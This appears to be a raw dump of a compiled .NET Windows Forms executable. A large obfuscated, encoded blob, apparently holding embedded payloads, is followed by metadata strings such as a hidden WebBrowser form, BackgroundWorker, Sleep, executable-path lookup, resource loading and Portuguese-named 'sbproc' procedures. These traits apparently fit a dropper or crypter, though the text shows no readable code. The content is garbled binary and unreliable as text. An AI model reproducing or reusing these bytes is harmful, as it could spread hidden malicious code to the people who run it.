j5POj4+PpY+PUY+PgZyJUY+piY+PgKeLj4/j9IidgpyLj4/i9Iidj6mJj4+Ep4ydi4+P4/SInY+epI+piY+PiaeMnYuPj+P0iJ2PnKKAnoCcjnGZjnGVhY+PrKeLj4+d8teLj4/H9IuPj87zip2Lj4/E9IuPj87zip2MnamJj4+Dp46d5gGDnoOehY+Prvzh15GLj4+A9Iydi4+P5PSInYOchY+PqKeLj4/E9IuPj87zip1wcHFotYCegJyLcYuPj7b0i4+Pz/OKnYeeh5zXmIeej6mJj4+Gp4adz5CLj4/t9ImdhY+Prvzh14uPj+z0iZ2Lj4/E9IuPj87z
ip2Lj4/k9IidqYmPj4Onjp2Fj4+pp4uPj+v0iZ2FnoWPj6784deLj4/s9Imdi4+PxPSLj4/O84qdi4+P5PSInUeigJ6AnItx4YuPj+v0iZ3lhJ6EnNeYhJ6PEx6Fj4+qp4WPj6+n1+WEnuGLj4/q9ImdjYSehZ6PqqSEnJmFnI6Pj68Cb9eYi4+P6/SJnYmcjY+PhSqFj4+Rp4WPj5KnjY+PhV+Fj4+T/NfVhY+Pq6eNj4+FA4meh57XhY+Pq6eNj4+HA4qe14uPj7j0i52Hj4+Pjo+3h5yZqYmPj4Onjp2Lj4/Z9IuPj87zip2NhY+Prvzhi4+PxPSLj4/O84qdi4+P5PSInY+piY+PhaeMnYuPj+P0iJ2PnqSPqYmPj4ynjJ2Lj4/j9Iidj5yigJ6AnI5xmY5xlYWPj6yni4+PjvKPjo+Ir4ydj4+Jj4+Op4yNqYmPj4inmYuPj+T0iJ2Pl6KAnoCcjnGZhY+PraeFj4+Q8YmPj4enz5CPj7+Pr4uPj9r0i4+PzvOKnYWPj6784YuPj8T0i4+PzvOKnYuPj+T0iJ2piY+PgaeFj4+vp+GLj4/E9IuPj87zip2Lj4/k9IidqYmPj4uniJ2Oj4+vAsuQm4WPj5DxlZmFj4+Q8YWPj5DxiYyKnI2Pj4cqhY+PkaeFj4+Sp42Pj4dfhY+Pk/zXi4+PuPSLnYeLnI2Pj4kqhY+PkaeFj4+Sp42Pj4lfhY+Pk/yHjY+PhJpxiJ2Nj4+FmnGJnY2Pj4eacYqdjY+PiZpxi52Nj4+MmnGMnYOFj4+Up56dnpyFj4+Vp5+dn5yFj4+Wp5aNjp+Fj4+a4IWPj5ung6SPjp+Fj4+Xp/+Pj+z9hY+PmKf/j4+u/Y+VooCegJyOcZmFj4+Z4P+Pj9T9jLWkj46fhY+Pl6f/j4+g/YWPj5in/4+Prv2PlaKAnoCcjnGZhY+PmeD/j4+e/YznpI+On4WPj5rghY+Pm6ePn6KAnoCcjnGZhY+PnKf/j4+M/YyF/4+Pjv2Pj56Pj46Pj4x+j4W/lI+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Mj4+XH4+Pq/uPio+Nj4+Px4+Pj4+Pj7H/j4+Pj4+Pj4+Pj4+Pj4+Pj82Pj8+Pj4+Pj4+Pj4+Pj4+Pj6mPj4+Nj4+P74+Pj4+Dj4/s4OPq/aHPj4/Pj4+Pj4+Pj4+Pj4+Pj4+tj4+Pi4+Pj8+Pj4+MZ4+Pj+z9/P2h74+Pr4+Pj4+Pj4+Pj4+Pj4+PjY+Pj6+Pj4+vj4+PkRuPj4/79+r7oY+Pj4+Pj4+Pj4+Px4+Pr4ePj4+Pj4+Pj4+Pj4ePj6+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj5OPj7KLj4+Pg4+P74+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+MZ4+Pz4+Pj4/Aj4+xs4+Pj4+Pj4+Pj4+Pn4+Pj4+Pj5+Pj5+Pj4+Pn4+Pn4+PCs+PjI+Pj4+Pj42Pj48Pj4+Pj4+Pj4+Lj4+Pj4+Pj4uPj42Pj4+vj5+Pj4+Pj8+Pj4+vj4+PsQGPj4+Pj4+Jj4+Pr4+PhI6Ero2Pb4+Pj4+Pj4+P2pP+zI+MjsOPj8rfj4+Pj4+Pj6uFgoKh6uvg4q/cwMuv4eav4fr9r+rtr/vg4eHu7K/i7v3o4P3/r/zm59uuQsOON65ChjuPgTWQgY+Pjw+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj8+Pj4+Pj4+PN4+PcHCPj4+Lj4+PjI8f1cKPj6ePr4+Pj4+P7Y/mj8OP/Y/qj/uP/4/2j/2PzI/rj86Xj4+PVo+Pj4+VQhaz38vO38vO34+Pj4+Pj4+Oj4+Pjfvq3Ors/frg/Ord6uLm++H63aH86uz9+uD86t2h4ur7/PbcrLa3v+q7vLa+ubrsuu64uO2y4erk4Nv26sTs5uPt+t+v
o+Pu/fv66uGy6v36++P6zK+jv6G/ob+hvbLh4Ob8/erZr6Pt5uP94Oz84q+j/err7urd6uz9+uD86t2h/Ors/frg/OrdoeLq+/z23OOPj48ej4+PjjFgRUGPj6dRpYmPpIWJj4+jp4+ej4+Vj4+PhI+Ov5yPpYmPpIWLj49N8Y+ej4+Wj4+PhI+Ov5yPj6WPj4WPj+2njamPpY+Lj49ND42Pj5X7hY+P7qeJj4+k/NWPj6WJj6SFlI+PhfuIhIWPj56nhY+P0OCLj49O8f+PjyL9iY+PqaePno+Pl4+Pj6mPjL+cj4+lj4uPj04PjY+pj6WJj6SFi4+PTvGPno+PmI+Pj4SPjr+cj6WJj6SFi4+PT/GPi4+PTw+IhIWPj9H8hY+P0uCFj4/cp42Pj5Zf/4+PHP2vo4eDhY+P06ebi4+PT/GPno+PmY+Pj7SPjb+cj4+lj4WPj9jyhY+P1fyNj4WPj46njY/ZpYmPpIWIj4+Fj4/W4IiFj4/Y9I2EpI+Pjaeco4aCjnGblI+PjAOIhIWPj9fghY+P2PSNj56Pj5qPj4+7j42/nI+lj4+Fj4+Op42PpY+PpY+Uj4+NDomUj4+NmnGPnYyPno+Pm4+Pj52Pjb+cpYmPjqSFjY+KpIekhaSPj46nhaOIhI5xm5SPj44DjY+ej4+cj4+Pr4+Nv5yliY+khYWPj9unjY+ej4+dj4+Pg4+Ov5yliY+khYWPj9ynjY+Pil+Pno+Pno+Pj5+Pjr+cpYmPpIWFj4/dp42Pno+Pn4+Pj4OPjr+cj4+liY+khYWPj96nhY+PnqeMjY+ej4+Aj4+PnY+Nv5yliY+khYWPj8Lgi4+Pi/GPno+PgY+Pj5+Pjr+cpYmPpIWFj4/D4IuPj4zxj56Pj4KPj4+fj46/nKWJj6SFhY+PxOCLj4+N8Y+ej4+Dj4+Pn4+Ov5yliY+khYWPj8Xgi4+PjvGPno+PhI+Pj5+Pjr+cj6WPi4+Piw+Fj4/G/IuPj4wPhY+Px/yLj4+ND4WPj8j8i4+Pjg+Fj4/J/CWPpY+PhY+Py6eNj6WPj6WPj4WPj86njamliY+F442Pi6SF185/j4+Pj4+PrOONgKOIhItx5ZmNj56Pj4WPj4+vj42/nI+Pj6WJhTaFj4+4p9SFj4+1p+OMz4+Pj4+Pj4+siY+PqqeNj56Pj4ePj4+uj4y/nI+Pj6WIhIWP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LvSLj48l84qdmYTlWY+Pj3evi4+PxvSLnYacN5ieqYmPj5SnmJ2YnAuGnguLj48a9IuPjyTzip2NhY+PvqfhgZ6Lj4+89Iydj4+ORLaUnpScjnGZjnHlmeGBnoGcN4WPj72niY+PkKeVj4+/j6+Lj48b9IuPjyTzip2Fj4++p+GLj48F9IuPjyTzip2Lj4+89Iydj4+NmLaUnpSc0I5xmYtx5ZmJj4+Rp4WPj7+nmYuPj7z0jJ3QjnGZi3GZiY+PkqeYnZicmZWcnZychY+Pv6eZOFnlkeGLj4/59I+di4+PvPSMnYmPj5inj52Lj4+79Iydj4+N97ePiaOUnpSc745xmY5xj4/Vwq+Lj4+49IudjnGZjnHlj4/K36/hi4+PJvSKnYuPj+fyj46Pja+PnYuPj67yhY+PoKeNj4+GA4WehZ2KnI+Nj4+b/o2Pj5v2haSZnqmKoqqFj4+jp4WPj6TgjY+PmwOKnpyej4WPj6Gngp6cnYKcWYuPj8b0i52Hno+Pj4yIt4+Jo5SelJyOcZnqjHGZiY+PlaeMnYWdm5qelZmDnYidjJuPhY+PoqeNnYucj42Pj4T+jY+PhPaFpJueqYqiqoWPj6OnhY+PpOCNj4+EA4uehY+PpqeNnYechY+PpaecnZychY+PpqeNnYOFj4+np5aNjY+Pgppxg52Nj4+CmnGInY2Pj4aacYWdjY+PhZpxjJ2Nj4+fmnGPnYScm4+ej4+Kj4+MJI+Fv5yPj6WPj4WPj46njamPj6WHj6SDiTG+h56HnImeip6KnFmYip6Pi5xZ
mIuej4iki5yZiqOInoicjnFVmDgBiIuej4WPj6iniBPuHoueiO6GHoqejYqeibekipyJnFWYOAGNmYucmYWOj4+kAlmYOAGNhIWPj6ngjIWPj6qngh5VmDgBjY2PhY+PqKeNj56Pj4yPj4/xj4q/nI+Pj6WJj6SFhY+PqeCNhY+PqqePno+PjY+Pj56Pjb+cjo+Pgo+Pj5CPj439j4+N/4+Pj42Pj4+Pjo+Pgo+Pj5+Pj43Sj4+P+Y+PjmiPj4+Pj4+7zo+lj4+Fj4+rp5mPj1GFj4+up6mFj4+sp5uZhY+PreCIno+InIWPj6+nqpBRj4+Pj1GFj4+up4+JnIWPj6+nqp9Rj4WPj5Dgip6PhY+PkeCFj4+Sp4Sejy3/j48A/ZWEno8tFZGJloSejy3/j4+g/ZeEno8thY+PmuCFj4+b4IWPj5zgiY+Pi6eYhJ6PLf+PjwD9mYSehJyOj4+VApQVhpCJip6KnIWPj5PgmP+Pj7z9hY+PlPGPj4WPj5WnhY+PmacVkYn/j4+g/YWPj5rghY+Pm+CFj4+c4ImPj4unhY+PjaePj4+POreKo4KegpyFj4+Wp4WPj5mnFZGJ/4+PoP2Fj4+a4IWPj5vghY+PnOCJj4+Lp4+Pj2i2g56DnI5xmYWPj4inmf+Pj5r9FZKJj4+OpKmFj4+Xp4WPj5mnFZOJ/4+PoP2Fj4+a4IWPj5vghY+PnOCJj4+Lp4+Fj4+Yp4uehY+PmacVk4n/j4+g/YWPj5rghY+Pm+CFj4+c4ImPj4uni5yFj4+KpxWUidOjg56DnI5xmYWPj4inmf+Pj5r9FZWJD6KDnoOci3E4AYaeh56Ph5xZmIeej6mFj4+d4IWejy0VlomYhZ6PLYiZhZ6FnI6Pj4wCl4WPj56nhY+Pn6eGm4WPj4CnhY+PgaeFj4+Cp4+Pjo+vhY+PgqeZ/4+PqP2GxaODnoOcjnGZhY+PiKeZ/4+PkP2Fj4+D4IaCFYeehp79pIecmYachY+PhOCFj4+F4ImPj6anhY+PhqePj4WPj4enV4+PjGevh4Kjg56DnI5xmYWPj4inmf+Pj5r9FYWQiamFj4+Jp42dFYSQiYSJj4+bp/+Pj4T9hY+PiqcVl4mFhY+Pi6eZmv+Pj479hY+PjKeFj4+Np4+Pno+Pjo+PjRSPhr+Uj4+PpY+PiY+PnaePhY+PjqeNj82Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+nbY+PoKSPj4+Pj4+PjI+Pu5OPj9efj4qPjY+Pj8ePj4+Pj48D74+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+PzY+Pz4+Pj4+Pj4+Pj4+Pj4+PK4+Pj42Pj46Pj4+Pj4OPj+zg
4+r9oc+Pj8+Pj4+Pj4+Pj4+Pj4+Pj/uPj4+/j4+PT4+Pj6D3j4+P7P38/aFPj4/Pj4+Pj4+Pj4+Pj4+Pj4/9j4+PjY+Pjy+Pj4+Ot4+P7vvu6/yh74+Pr4+Pj4+Pj4+Pj4+Pj4+Pi4+Pj+GPj4+vj4+P4wuPj4/79+r7oY+Pj4+Pj4+Pj4+Px4+Pr4ePj4+Pj4+Pj4+Pj4ePj6+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj5OPjy+Pj4+Pg4+Oj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+g94+PT4+Pj4/Aj48Do4+Pj4+Pj4+Pj4+Pn4+Pj4+Pj5+Pj5+Pj4+Pn4+Pn4+PCs+PjY+Pj4+Pj4uPj46vj4+Pj4+Pj4+Lj4+Pj4+Pj4uPj42Pj4+vj4/Pj4+Pjy+Pj4+vj4+PA/GPj4+Pj4+7j4+P4Y+PhI6Ero2Pb4+Pj4+Pj4+P2ujFj4+LjsOPj8rfj4+Pj4+Pj6uFgoKh6uvg4q/cwMuv4eav4fr9r+rtr/vg4eHu7K/i7v3o4P3/r/zm59uuQsOON65ChjuPgTWQgY+Pjw+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj8+Pj4+Pj4+PN4+PcHCPj4+Lj4+PjI8f1cI=proxcRoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGholihoaGhYaGloaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhAXJGN2eHd/aWl7NSYQFyR1fHRTbmlvaG41Jjo6EBckY25zaG95f2k1Jjo6OjoQFyRpf31/dnNsc2hKfn9uaX9va39oNSY6Ojo6OjoQFyQ1OH9pdnt8OCdpaX95eVtzbzo4aH9xdWx0U2l7OCd2f2x/djp2f2x/VnR1c25v
eX9iX35/bml/b2t/aCY6Ojo6Ojo6OhAXJDgpbDR3aXsgd3V5N258dWl1aHlzdzdpe3d/cnlpIHRobzgnaXR2d2I6aX99f3ZzbHNoSn5/bml/b2t/aCY6Ojo6OjoQFyRjbnNob3l/aSY6Ojo6EBckOChsNHdpeyB3dXk3bnx1aXVoeXN3N2l7d39yeWkgdGhvOCdpdHZ3Yjp1fHRTbmlvaG4mOjoQFyQ1OGpqezR0dXNue3lzdmpqW2NXOCd/d3t0OjgqNCo0KjQrOCd0dXNpaH9sOmNuc250f35TY3Z4d39paXsmOjoQFyQ4KjQrOCd0dXNpaH9Mbml/fHN0e3c6OCtsNHdpeyB3dXk3bnx1aXVoeXN3N2l7d39yeWkgdGhvOCdpdHZ3Yjpjdnh3f2lpeyYQFyQlOGl/Yzgnf3R1dnt+dHtuaTo4IjdcTk84J310c351eXR/OjgqNCs4J3R1c2lof2w6dndiJSalofUaGhoaGhoaGRoaGzIaHhobGgoKChoYGhoY8hoeGhsaCjo6GhgaGxoaGhrl5Roa5eUaGhsaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhqaGhrl5RoaGhoaGhoaGhoaGhoaGhraXl5eXl5e3l3W1tbW1tZWXZKSkpKSklJd4uXl5eXlVV3i5eXl5eVVXeLl5eXl5VVd4uXl5eXlVV3i5eXl5eVVXeLl5eXl5VVd4uXl5eXlVV3i5eXl5eVVXV5eXl5eXl5tbW1tbW1tHRoaGhoaGhoaGuXl5Roa5eUa5RrlGhoa5Rrl5RoaGuUaGuUaGhra2toampqaGhqamhqaGpoaGhqaGpqaGhoamhoamhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhraGhoaGhoeGhsaGho6GhoaChoaGjLl5eXl5eXl5eXl5eUdGhraGRoamhsaGpobGhqaGxoamhsaGpobGhqaGxoamhsaGpobGhqaGxoamhsaGpobGhqaGxoamhsaGpobGhqaGxoamhsaGpobGhqaGxoamhsaGpobGhqaGxoamhsaGpobGhra5eXl5eXl5eXl5eXl5eXl5RoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhpaXl5eXl5eXl5eXl5eXhoa3tbW1tbW1tbW1tbW1tYeam5T1NRUVlZWVlZWVlZWHmpeXl5eXl5eXl5eXl5eXh5qnpKSkpKSkpKSkpKSkpIeau7l5eXl5eXl5eXl5eXlHmru5eXl5eXl5eXl5eXl5R5q7uXl5eXl5eXl5eXl5eUeau7l5eXl5eXl5eXl5eXlHmru5eXl5eXl5eXl5eXl5R5q7uXl5eXl5eXl5eXl5eUeau7l5eXl5eXl5eXl5eXlHmru5eXl5eXl5eXl5eXl5R5q7uXl5eXl5eXl5eXl5eUeau7l5eXl5eXl5eXl5eXlHmru5eXl5eXl5eXl5eXl5R5q7uXl5eXl5eXl5eXl5eUeau7l5eXl5eXl5eXl5eXlHmru5eXl5eXl5eXl5eXl5R5q7uXl5eXl5eXl5eXl5eUeau7l5eXl5eXl5eXl5eXlHmru5eXl5eXl5eXl5eXl5R5q7uXl5eXl5eXl5eXl5eUeal5eXl5eXl5eXl5eXl5eHmptbW1tbW1tbW1tbW1tbRoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGuXl5Roa5eUa5RrlGhoa5Rrl5RoaGuUaGuUaGhra2toampqaGhqamhqaGpoaGhqaGpqaGhoamhoamhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhiaGhoaGhoeGhsaGhpaGhoaOhoaGjIaGhoaGioaNBovGisaNBorGjQaLhoaGnQadRpzGmkaaBp/GkwaOhpjGnYaeBp3Gn8aaRppGlsa
GxoTGiYaGhoaGioaNBovGisaNBorGjQaLhoaGnQadRpzGmkaaBp/Gkwabhp5Gm8afhp1GmgaShobGhMaIhoaGhoafxpuGnsafhpqGk8acRpJGhoaGhp/GncaexpUGm4aeRpvGn4adRpoGkoaGxoTGi4aGhoaGn8aYhp/GjQafxpuGnsafhpqGk8acRpJGhoafxp3GnsadBp/GnYacxpcGnYaexp0GnMafRpzGmgaVRobGhcaXhoaGhoaLhorGioaKBo6Gjoasxo6Gn8abhp7Gn4aahpPGnEaSRoaGm4achp9GnMaaBpjGmoadRpZGnYaexp9Gn8aVhobGgsaUhoaGhoafxpiGn8aNBp/Gm4aexp+GmoaTxpxGkkaGhp/GncaexpUGnYaexp0GmgafxpuGnQaUxobGhcaJhoaGhoaKho0Gi8aKxo0GisaNBouGhoaGhp0GnUacxppGmgafxpMGn8adhpzGlwaGxoTGi4aGhoaGn8abhp7Gn4aahpPGnEaSRoaGhoadBp1GnMabhpqGnMaaBp5GmkafxpeGn8adhpzGlwaGxoTGiYaGhpuGmkaexp2GkoadRpyGnkaXxoaGhoafxp3GnsaVBpjGnQaexpqGncadRpZGhsaEBouGhoaahp1GmIacxpsGnsaSRoaGmkabhp0Gn8adxp3GnUaWRobGhIaMhoaGioaeBouGioaKhoqGioaKhobGhoYThoaGnUafBp0GlMafxp2GnMaXBp9GnQacxpoGm4aSRobGhoYYh6qGhoaGhoaGnQadRpzGm4aexp2GmkadBp7GmgaThoaGh4aPhoaGhoadRp8GnQaUxp/GnYacxpcGmgaexpMGhsaGhpeGhoaGhoaGhoaGhoaGhoaGxoaGh4aGhoaGhoaJRoVGhoaHhobGhUaGhoeGhsaGxoa5PUepxoaGhoaVRpcGlQaUxpFGlQaVRpTGkkaSBpfGkwaRRpJGkwaGhouGQIaGhoaGhoaGhoaG/AaGnKqGhoaGhoaGhoaGhkCGhp7ehoaGhoaGhoaGhoaOBoacpIaGhoaGhoaGhoaGzIaGn16GhoaGhoaGhoaGhjyGhp+YhoaG0oaGhoaGhsaGhoaGhoaGhoaGhoaGhoaG1oaGhoaGhsaGhoaGhoaGhoaGhoaGhoaGyoaGhoaGhsaGhoaGhoaGhoaGhoaGhoaGzoaGhoaGhsaGhoaGhoaGhoaGhoaGhoaGwoaGhoaGhsaGhoaGhoaGhoaGhoaGpoaGuIaGhobGhsaGhoaGhoaGhoaGhoaGpoaGvoaGhobGhsaGhoaGhoaGhoaGhoaGpoaGtIaGmUaGhsaGhoaGhoaGhoaGhoaGpoaGqoaGhoZmhoaghoaGhgaGBoaGhoaGhoaGhoaGhoamhoamhoaGgKaGhpyGhoaCpoaGkoaGhoUmhoaKhoaGhkaHhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGlo6Gj/lGhoaGhp2dn40f39odXlpdxp0c3tXf2JfaHVZRRoaGhoaGhoaGhoaGhoaGhoaGhoaVWoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaOhoaGlVkGhoaGhoaGhoaGlVGGhoaGisvKS4oeSosfyJ4KDcteCN4N3t7Ly43eSoqIzcif39+L3h8LD4aGzMaGio0Lys0KzQuEhobFxtpbXVock50dXNuan95Yl90dVRqe2hNDBhOGhsaGwQaGhoaGhIaGxIaGhoaGhkaGxIjmwsbGzocGhpqdWJzbHtJHRobFhoabml7dkp1cnlfExobFBoaf257fmpPcUkSGhsXGhouKyooOjqz2Dp/bnt+ak9xSQsaGwwaGml9dHNubn9JNGNXERobCjIIGx0eGhoqNCo0
A(%s15
System.Windows.Forms.Form
3System.Resources.Tools.StronglyTypedResourceBuilder
pass
System.Windows.Forms
%tEXtdate:create
%tEXtdate:modify
mscoree.dll
_WebBrowser1
add_Shutdown
set_WebBrowser1
get_WebBrowser1
BackgroundWorker1_DoWork
get_ExecutablePath
get_ResourceManager
set_ShutdownStyle
noreply@nos.pt0
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
DebuggerHiddenAttribute
add_DocumentCompleted
BackgroundWorker1
WebBrowser
BackgroundWorker
AuthenticationMode
DebuggableAttribute
DebuggingModes
ShutdownMode
ResourceManager
DebuggerStepThroughAttribute
m_FormBeingCreated
OnCreateMainForm
sbproc.omeusegundo
file.resource
Hashtable
sbproc.omeuprimeiro
sbproc.omeuterceiro
Sleep
GetHashCode
Hide
$5eccdbfc-28d9-4c2b-8e7b-28e7d177a3f1
_BackgroundWorker1
set_BackgroundWorker1
get_BackgroundWorker1
WebBrowser1
WebBrowser1_DocumentCompleted
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
